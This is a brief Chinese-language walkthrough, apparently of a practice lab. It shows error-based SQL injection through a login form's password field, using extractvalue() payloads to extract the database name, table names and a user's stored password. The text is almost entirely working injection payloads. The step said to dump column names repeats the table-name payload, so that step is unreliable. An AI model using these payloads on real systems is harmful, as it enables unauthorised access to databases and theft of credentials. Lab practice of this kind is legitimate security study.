(1)无论怎么输入username,都没有回显。尝试改变password的输入。找到了闭合方式:单引号
(2)报错注入:
爆库名
admin&passwd=admin' and extractvalue(1,concat(0x7e,(select database())))and '#
爆表名:
uname=admin&passwd=admin' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) and '#&submit=Submit
爆users表的列名
uname=admin&passwd=admin' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) and '#&submit=Submit
爆值:
uname=admin&passwd=admin' and extractvalue(1,concat(0x7e,(select password from (select password from users where username='Dumb' )as a))) and '#&submit=Submit
注意此处查询需要嵌套查询,否则会出现错误:You can't specify target table 'table name' for update in FROM clause
也需要对查询的结果命名,否则会出现错误:Every derived table must have its own alias
